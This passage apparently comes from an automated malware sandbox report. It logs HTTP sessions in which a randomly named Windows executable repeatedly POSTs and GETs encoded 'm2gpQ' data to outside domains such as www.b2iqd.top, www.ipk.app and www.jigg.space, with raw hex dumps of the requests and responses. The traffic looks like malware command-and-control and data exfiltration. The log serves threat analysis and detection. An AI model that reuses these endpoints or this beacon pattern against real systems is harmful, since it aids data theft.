Nov 12, 2024 07:56:10.430780888 CET	1770	OUT	POST /g8fb/ HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.b2iqd.top Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.b2iqd.top/g8fb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 4b 4d 63 43 32 35 2b 4b 67 72 77 41 5a 7a 49 5a 44 6f 62 33 71 37 62 4e 35 34 75 37 79 31 5a 53 61 43 65 66 44 75 30 50 48 32 4b 31 45 43 7a 46 47 44 56 56 74 61 58 62 35 6d 30 71 46 58 51 39 58 31 4c 6b 51 63 4b 57 79 42 41 73 54 61 76 2f 30 33 62 30 2f 44 52 30 59 5a 68 57 71 6c 58 2f 42 48 50 2f 6a 2f 65 41 39 39 64 77 31 6f 51 36 46 61 30 76 56 5a 78 7a 38 44 37 51 45 48 53 6c 64 47 4f 31 4c 71 2f 54 50 79 49 78 33 7a 2b 5a 4d 71 6d 4c 76 55 6a 55 6c 6e 57 6a 73 33 38 6c 63 47 36 6b 61 78 71 49 48 47 44 50 4d 79 6b 6e 72 6e 48 42 79 6a 43 44 4e 41 54 4a 61 6f 6a 71 48 54 7a 74 6a 6d 2b 31 58 33 56 66 6f 72 6b 54 36 68 65 53 6b 65 39 71 7a 6e 74 5a 71 64 36 4e 6a 77 2b 59 4f 44 49 53 38 48 4c 75 41 62 33 54 65 5a 59 48 5a 56 5a 79 57 56 52 6f 77 2b 47 30 67 54 4b 41 5a 57 64 5a 56 4a 56 72 75 7a 74 55 47 51 57 36 43 7a 6b 38 52 59 61 68 66 68 4a 64 75 34 54 55 6f 68 77 55 58 4d 39 6f 67 31 2f 48 32 31 70 30 36 6d 68 41 6a 77 72 77 46 6b 5a 6a 69 50 79 70 44 38 47 6d 35 56 63 [TRUNCATED] Data Ascii: m2gpQ=VKMcC25+KgrwAZzIZDob3q7bN54u7y1ZSaCefDu0PH2K1ECzFGDVVtaXb5m0qFXQ9X1LkQcKWyBAsTav/03b0/DR0YZhWqlX/BHP/j/eA99dw1oQ6Fa0vVZxz8D7QEHSldGO1Lq/TPyIx3z+ZMqmLvUjUlnWjs38lcG6kaxqIHGDPMyknrnHByjCDNATJaojqHTztjm+1X3VforkT6heSke9qzntZqd6Njw+YODIS8HLuAb3TeZYHZVZyWVRow+G0gTKAZWdZVJVruztUGQW6Czk8RYahfhJdu4TUohwUXM9og1/H21p06mhAjwrwFkZjiPypD8Gm5VcF/kh6Fd+jnrxUzuWiN8+MfPoMHZ0zlcf09ex2CU6JLPhILOTC69epeBchIiC+bY0B69uAaE6HxjbRB/M+GgSlhHAMYws3/9pzFvcRkPlRjXhNOG95mbwNdc753y8DOfi93qkKk1MBHUG9c9rHYm3emgdUZawlYCV9J3La5QYDym72FC/oi7AVZpwb0M2bjRouYw20MveX7KYPXAPNG65VQVJ8AVj6UCVsFr6oT5YofjV7VGm+p/kl10wv8o/Zrw91ToSYAOYUPoSi1JR5GyiLUv7JMofwlCX+H4SQXbGDkMdVpffnfLixYe0QJMGk1fDLyoUMSVCy2f2LrHCgAl7MEkijf1FctzwUEPogmAkEKw+1NKxBaFT6URQrC63xsR8KkZwztt9rYv/Djgppm9rUs/sekY4jCypxuiUSvo1vehetNpwUeOGu3Dfbdpu0fxtYoot7qvh5CpBF66UrSrmcHD6utbamfJp5ktGzoqQZVfEEOVlmbN8IjFt7MQ/0Qy/3DPHJO2ejt2lBJpFefjqsLC7xIJi4jEtsvNhCgttT/YRu0ODobQ0bGWXcBuXtQRqo1WVKd6x//6vmMg/6K2+tFUfUa/LowMsCVgR5DZECk13olIQUMNS5mIent6n92sY8AuguwL60SBnaS4tkKbNky6lrHDzxxEZpC [TRUNCATED]
Nov 12, 2024 07:56:11.399725914 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:56:11 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49990	20.2.208.137	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:12.973644972 CET	488	OUT	GET /g8fb/?m2gpQ=YIk8BARVWSn/QuGUQnkYsazoDYcX4x9RQfS4QBmHenTb8HDBBCrEcM3ZVamem1jnr3BtnBAXBF5diw+d30GcsvfF4YEeTq91lSuPwlPrCtk82kMLzGGbulJdlPGFAXTDhsCQnbqSco+x&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:56:13.918193102 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:56:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49991	13.248.169.48	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:19.184140921 CET	731	OUT	POST /phav/ HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.ipk.app Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.ipk.app/phav/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4e 75 35 6f 6d 67 78 5a 46 62 6e 4d 5a 53 72 32 6f 48 74 4f 6b 57 31 4e 2b 38 2b 47 74 64 65 63 57 75 61 74 46 36 6a 4c 75 64 6b 6f 42 50 2b 31 65 64 6d 42 6a 61 65 30 79 4d 68 46 76 79 36 4f 30 61 6a 51 63 55 58 39 75 52 47 76 6e 62 33 2b 7a 51 6d 53 49 77 6a 4f 78 69 79 47 42 45 56 6b 36 33 6b 6c 4c 6e 39 6c 42 61 78 2b 4c 31 6a 36 30 76 39 65 30 6e 77 38 35 5a 78 63 58 72 50 38 31 4d 34 30 69 57 77 62 78 64 44 73 68 6b 46 61 77 70 73 44 37 4c 79 5a 6f 58 41 54 41 52 56 62 73 6d 39 67 69 68 64 74 73 4c 6e 53 65 42 4c 36 6f 34 43 6f 69 71 77 65 46 48 6b 37 6e 43 36 2f 77 6a 36 41 2b 54 45 72 6e 78 53 65 69 70 4e 67 36 67 3d 3d Data Ascii: m2gpQ=Nu5omgxZFbnMZSr2oHtOkW1N+8+GtdecWuatF6jLudkoBP+1edmBjae0yMhFvy6O0ajQcUX9uRGvnb3+zQmSIwjOxiyGBEVk63klLn9lBax+L1j60v9e0nw85ZxcXrP81M40iWwbxdDshkFawpsD7LyZoXATARVbsm9gihdtsLnSeBL6o4CoiqweFHk7nC6/wj6A+TErnxSeipNg6g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49992	13.248.169.48	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:21.728761911 CET	751	OUT	POST /phav/ HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.ipk.app Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.ipk.app/phav/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4e 75 35 6f 6d 67 78 5a 46 62 6e 4d 4c 68 7a 32 6b 47 74 4f 69 32 31 4b 78 63 2b 47 6e 39 65 59 57 75 47 74 46 2f 62 62 75 75 41 6f 50 4e 57 31 64 63 6d 42 6d 61 65 30 6d 38 68 41 6c 53 36 51 30 61 2f 2b 63 56 72 39 75 52 36 76 6e 65 54 2b 30 6e 61 56 4c 41 6a 4d 33 69 79 45 63 30 56 6b 36 33 6b 6c 4c 6e 35 50 42 65 64 2b 4c 41 7a 36 6d 61 52 42 71 58 77 7a 6f 5a 78 63 54 72 50 34 31 4d 34 57 69 58 73 78 78 65 37 73 68 6c 31 61 77 39 34 43 30 4c 79 54 72 6e 42 43 46 30 49 50 69 30 56 77 37 54 74 6e 69 70 66 4f 53 58 4b 59 79 61 4f 45 38 37 49 6c 42 46 41 4e 77 6b 6e 4b 79 69 2b 59 7a 78 77 4b 34 47 33 30 76 37 73 6b 73 53 70 6d 41 62 6b 47 48 52 4f 69 71 54 7a 52 72 72 72 6e 48 5a 55 3d Data Ascii: m2gpQ=Nu5omgxZFbnMLhz2kGtOi21Kxc+Gn9eYWuGtF/bbuuAoPNW1dcmBmae0m8hAlS6Q0a/+cVr9uR6vneT+0naVLAjM3iyEc0Vk63klLn5PBed+LAz6maRBqXwzoZxcTrP41M4WiXsxxe7shl1aw94C0LyTrnBCF0IPi0Vw7TtnipfOSXKYyaOE87IlBFANwknKyi+YzxwK4G30v7sksSpmAbkGHROiqTzRrrrnHZU=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49993	13.248.169.48	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:24.276073933 CET	1764	OUT	POST /phav/ HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.ipk.app Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.ipk.app/phav/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4e 75 35 6f 6d 67 78 5a 46 62 6e 4d 4c 68 7a 32 6b 47 74 4f 69 32 31 4b 78 63 2b 47 6e 39 65 59 57 75 47 74 46 2f 62 62 75 75 49 6f 50 38 32 31 66 2f 2b 42 6c 61 65 30 36 73 68 42 6c 53 37 56 30 61 6e 36 63 56 6d 43 75 55 32 76 6e 39 72 2b 31 54 4f 56 63 51 6a 4d 31 69 79 48 42 45 55 6d 36 33 30 68 4c 6e 70 50 42 65 64 2b 4c 42 44 36 32 66 39 42 6f 58 77 38 35 5a 78 59 58 72 4f 64 31 4d 77 38 69 58 6f 4c 77 75 62 73 68 46 6c 61 31 4c 45 43 72 37 79 56 75 6e 42 61 46 30 4d 35 69 30 4a 47 37 57 35 65 69 70 33 4f 57 6a 58 44 6e 49 79 43 2b 39 49 67 43 47 6f 31 7a 31 6a 65 71 43 71 39 73 43 59 35 30 57 7a 57 30 64 49 66 71 6e 49 43 66 34 63 45 41 51 54 31 6a 30 79 4f 75 72 44 59 59 74 71 42 75 46 41 77 55 5a 33 66 68 46 79 54 67 35 4c 30 74 4e 50 79 7a 4c 2b 2b 76 76 67 65 6f 4a 6a 37 45 31 51 54 46 6b 31 64 49 4f 61 37 69 35 30 79 34 46 78 75 61 4d 67 71 76 56 54 6e 6c 68 55 4a 32 2f 46 49 6f 2f 5a 56 58 43 4b 33 71 54 65 69 6d 50 65 38 53 39 6b 4c 30 59 63 6f 37 69 48 72 59 78 55 59 [TRUNCATED] Data Ascii: m2gpQ=Nu5omgxZFbnMLhz2kGtOi21Kxc+Gn9eYWuGtF/bbuuIoP821f/+Blae06shBlS7V0an6cVmCuU2vn9r+1TOVcQjM1iyHBEUm630hLnpPBed+LBD62f9BoXw85ZxYXrOd1Mw8iXoLwubshFla1LECr7yVunBaF0M5i0JG7W5eip3OWjXDnIyC+9IgCGo1z1jeqCq9sCY50WzW0dIfqnICf4cEAQT1j0yOurDYYtqBuFAwUZ3fhFyTg5L0tNPyzL++vvgeoJj7E1QTFk1dIOa7i50y4FxuaMgqvVTnlhUJ2/FIo/ZVXCK3qTeimPe8S9kL0Yco7iHrYxUYSQVthJaQot4GdsfvbIz/+7k2JqZqH9zwr7ANUTP5zcxxAftpxzhjO7NrKgbaWaLPH+dzMmMffaB8DmWMpDvA9c9MjVQlDezZ2Cf/RSF+VUWJo54G2e2SiU9aVruV2TfJLaBaq11tizLDRrhmBFSWSp1FRri7+Fie+ZdIleZgwqUnTffAToR/mcl2w6ZGNtY54C5EGLoUDxRUEChT+66b0iTV3B3IUMfBjuYSLm+fNy4yFfP1xnD/qrMZzCfyDjBXNpSqazz8r3bWhpcUWqENqEG+3WJq1Hksylnz4TlhSCGMGeePvcYWmPPMgfFk4G9AW1N6MLlW1wmmUOtaYrNo3pPrPGFYuaRjgJGi/uDyRAFk1jBAqGDEmCdkouitxQ1HmihuFUtcXE3LBCcDa8nMOJuec/kymmLWvLjm/KqipHpbHW7RZb3I5ByUertZT2JebM7lqx699TFrIRKfZptv9nVQxzvfBIKWlMv5RGlmkE7sBRvNZbMmjFuNQ0uNKECXTKyK9rFZQvvA3HoILmv0CSkCWVLHxhuPz5eShNQgIfjhcbg/uIeMqSBYmDa424qRpcK+LBV7YhcRKKdGSy5ZVD98C9mQFzfVjz4WxQ+m3mabU/Eo9bify/gJzkhhKRiustlb3xt6Ut/MIWAdWbxl2co/lof9MM8AkT [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49994	13.248.169.48	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:26.816833019 CET	486	OUT	GET /phav/?m2gpQ=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ2Xe2FD0eGM44XV8TC1BDup3KiSR4IJPoQsxoY4gT4/b1NYL9SIl9eH2&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.ipk.app Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:56:27.476536989 CET	419	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 06:56:27 GMT Content-Type: text/html Content-Length: 279 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 32 67 70 51 3d 41 73 52 49 6c 57 34 6c 46 4b 54 39 4e 67 65 36 6e 57 38 71 35 6b 5a 4a 39 2b 61 41 70 72 61 6f 43 4c 2b 37 45 65 44 55 74 61 46 71 41 64 4b 35 65 65 4b 6d 76 70 62 37 2f 65 6c 36 67 7a 58 62 76 61 37 48 44 31 50 47 79 32 37 45 6d 39 6e 6f 34 7a 76 54 51 32 58 65 32 46 44 30 65 47 4d 34 34 58 56 38 54 43 31 42 44 75 70 33 4b 69 53 52 34 49 4a 50 6f 51 73 78 6f 59 34 67 54 34 2f 62 31 4e 59 4c 39 53 49 6c 39 65 48 32 26 4b 6a 48 3d 4b 52 49 78 64 56 48 50 36 30 54 44 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?m2gpQ=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ2Xe2FD0eGM44XV8TC1BDup3KiSR4IJPoQsxoY4gT4/b1NYL9SIl9eH2&KjH=KRIxdVHP60TD8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49995	96.126.123.244	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:32.591948986 CET	740	OUT	POST /ezhm/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.jigg.space Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.jigg.space/ezhm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 51 53 4c 6d 69 47 54 42 61 4f 31 4c 48 7a 69 57 38 6b 45 49 32 52 53 77 52 46 77 30 48 79 6a 4d 44 79 4e 53 33 44 4c 34 54 31 51 6e 4e 62 36 54 30 35 78 72 42 31 37 69 56 75 6a 4d 5a 2f 74 36 6f 68 2b 53 79 49 78 31 75 48 62 54 55 56 2f 59 39 4c 4b 62 34 34 79 79 6d 7a 31 71 7a 6a 48 79 41 34 78 62 4e 6f 2b 69 30 50 64 41 5a 58 71 49 44 51 4e 44 70 61 68 52 4a 4f 46 2f 7a 4a 34 35 4c 36 73 4f 74 72 6c 42 2b 47 33 52 56 37 52 64 35 5a 74 79 4a 6f 6d 49 37 2f 33 52 58 2f 48 79 6f 39 6c 71 64 2b 34 51 7a 34 47 6c 65 39 66 77 6d 62 67 6a 58 6f 4d 31 63 69 50 4b 43 56 50 70 59 52 56 59 48 6c 5a 61 4d 6b 44 6e 6a 69 54 6f 73 77 3d 3d Data Ascii: m2gpQ=QSLmiGTBaO1LHziW8kEI2RSwRFw0HyjMDyNS3DL4T1QnNb6T05xrB17iVujMZ/t6oh+SyIx1uHbTUV/Y9LKb44yymz1qzjHyA4xbNo+i0PdAZXqIDQNDpahRJOF/zJ45L6sOtrlB+G3RV7Rd5ZtyJomI7/3RX/Hyo9lqd+4Qz4Gle9fwmbgjXoM1ciPKCVPpYRVYHlZaMkDnjiTosw==
Nov 12, 2024 07:56:33.166749001 CET	806	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 06:56:33 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd f7 57 50 0e 99 76 a6 e6 d3 8e 43 03 e9 c4 6e 8c ed 3a 71 e2 7c 60 73 c9 08 49 b1 44 85 44 41 80 9d 4e ff 7b b1 e9 c4 74 dc 43 75 40 da 65 f7 bd dd b7 92 fb fe eb 7c f8 b0 ba bd 52 88 4c d8 c5 3b 77 b7 29 0c f0 b5 a7 62 ae 5e bc 53 ea e5 12 0c 50 73 dc 9b 09 96 40 81 04 64 39 96 9e fa f8 30 ea 9c fd 89 3c fc 26 52 a6 1d fc a3 a0 a5 a7 6e 3a 05 e8 40 91 a4 40 d2 88 61 55 81 82 4b cc eb dc c9 95 87 d1 1a 1f 65 73 90 60 4f 2d 29 ae 52 91 c9 56 42 45 91 24 1e c2 25 85 b8 b3 37 3e 29 94 53 49 01 eb e4 10 30 ec 99 9a d1 86 93 54 32 7c e1 ea cd be 6f 67 5f 24 17 39 cc 68 2a 0f 6d fd bb f6 0c bf 64 38 27 ad 12 8c f3 22 63 de ae bf cf ba 5e 55 55 df d0 62 ba 5e 6b 79 0a 20 d6 55 45 3f 40 ba fa 31 8d bb 57 af 2d cf 31 45 ef ff 28 5c fd 30 18 37 12 68 ab 08 ce 04 40 9e 8a c4 73 73 fc f0 b1 2d 46 d3 b2 22 b7 69 ad ae c4 1b a9 c7 a0 04 8d b7 15 b7 53 e2 a5 e0 50 52 c1 95 16 94 f2 f3 4d bf 5d c8 6e 55 94 23 51 69 52 a4 1a 13 b0 9e af e0 1a a9 1b [TRUNCATED] Data Ascii: 266SMs0WPvCn:q\|`sIDDAN{tCu@e\|RL;w)b^SPs@d90<&Rn:@@aUKes`O-)RVBE$%7>)SI0T2\|og_$9h*md8'"c^UUb^ky UE?@1W-1E(\07h@ss-F"iSPRM]nU#QiRR<E=H:8?EAgmv=9VoIpuw:tf=%]-n'do)S7hD6gI,= +&c/`pCx u_vWA,^-iduKrgr 6FV5IYO7ixxl(o>\cW"d$1GEGI_Q7Ww7~00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49996	96.126.123.244	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:35.136682034 CET	760	OUT	POST /ezhm/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.jigg.space Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.jigg.space/ezhm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 51 53 4c 6d 69 47 54 42 61 4f 31 4c 47 57 79 57 2f 44 6f 49 7a 78 53 33 49 31 77 30 64 43 69 46 44 79 42 53 33 43 2f 6f 51 47 30 6e 4e 36 4b 54 31 38 46 72 52 6c 37 69 65 4f 6a 4e 58 66 74 39 6f 67 44 76 79 4e 52 31 75 48 50 54 55 55 50 59 38 38 2b 61 34 6f 79 73 76 54 31 6f 2b 44 48 79 41 34 78 62 4e 6f 71 4d 30 50 56 41 61 6d 61 49 52 6a 56 41 6b 36 68 51 42 75 46 2f 33 4a 35 52 4c 36 74 5a 74 71 70 2f 2b 45 2f 52 56 35 35 64 35 4d 42 78 41 6f 6d 43 6c 50 32 68 47 4d 6d 75 78 34 4a 69 54 4e 67 6c 2b 70 36 5a 66 4c 65 53 38 35 73 50 4a 35 30 4f 59 67 72 38 56 7a 53 63 61 51 52 41 4b 48 74 37 54 54 6d 4e 75 77 79 73 36 42 4a 71 4f 59 4d 49 72 47 41 69 67 71 37 66 49 43 31 64 63 76 30 3d Data Ascii: m2gpQ=QSLmiGTBaO1LGWyW/DoIzxS3I1w0dCiFDyBS3C/oQG0nN6KT18FrRl7ieOjNXft9ogDvyNR1uHPTUUPY88+a4oysvT1o+DHyA4xbNoqM0PVAamaIRjVAk6hQBuF/3J5RL6tZtqp/+E/RV55d5MBxAomClP2hGMmux4JiTNgl+p6ZfLeS85sPJ50OYgr8VzScaQRAKHt7TTmNuwys6BJqOYMIrGAigq7fIC1dcv0=
Nov 12, 2024 07:56:35.732613087 CET	806	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 06:56:35 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d ef 57 50 1e 32 ed 4c 6d 6e 76 62 37 90 4e 4c e3 5b 9d 38 71 2e d8 bc 64 84 a4 58 a2 42 a2 20 c0 4e a7 ff 5e 2e 9d 98 8e fb 50 3d 20 ed b2 7b ce ee 59 c9 7e ff 75 e9 3e 6c 6e af 14 22 23 76 f1 ce ae 36 85 01 be 75 54 cc d5 8b 77 4a b9 6c 82 01 6a 8e b5 19 61 09 14 48 40 92 62 e9 a8 8f 0f e3 ce e0 4f e4 e1 37 91 32 ee e0 1f 19 cd 1d 75 d7 c9 40 07 8a 28 06 92 06 0c ab 0a 14 5c 62 5e e6 ce ae 1c 8c b6 f8 28 9b 83 08 3b 6a 4e 71 11 8b 44 b6 12 0a 8a 24 71 10 ce 29 c4 9d da f8 a4 50 4e 25 05 ac 93 42 c0 b0 63 74 f5 36 9c a4 92 e1 0b 5b 6b f6 ba 9d ba 48 2e 52 98 d0 58 1e da fa 77 ed 09 7e 49 70 4a 5a 25 e8 e7 59 c2 9c aa bf cf 9a 56 14 c5 99 de 0d e9 76 db 4d 63 00 b1 a6 2a da 01 d2 d6 8e 69 ec 5a bd b6 3c c7 14 fd ff a3 b0 b5 c3 60 ec 40 a0 bd 22 38 13 00 39 2a 12 cf cd f1 c3 c7 b6 18 4d cb 8a dc c7 a5 ba 12 ef a4 16 82 1c 34 de 56 5c a5 c4 4b c6 a1 a4 82 2b 2d 28 e5 e7 9b 7e 55 48 b5 0a ca 91 28 ba 52 c4 5d 26 60 39 5f c1 bb a4 6c 48 [TRUNCATED] Data Ascii: 266Sr0}WP2Lmnvb7NL[8q.dXB N^.P= {Y~u>ln"#v6uTwJljaH@bO72u@(\b^(;jNqD$q)PN%Bct6[kH.RXw~IpJZ%YVvMciZ<`@"89M4V\K+-(~UH(R]&`9_lHq Q[ J/1NdEqfnZe'B<d:x?7`.%]O`{I796"=gV@UYZDq0l_"48MG,_1<t%wGt:5~"GE0af./&Ln<0_"BwC'}pE-ly<$qVM~>T7WRt~}(0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49997	96.126.123.244	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
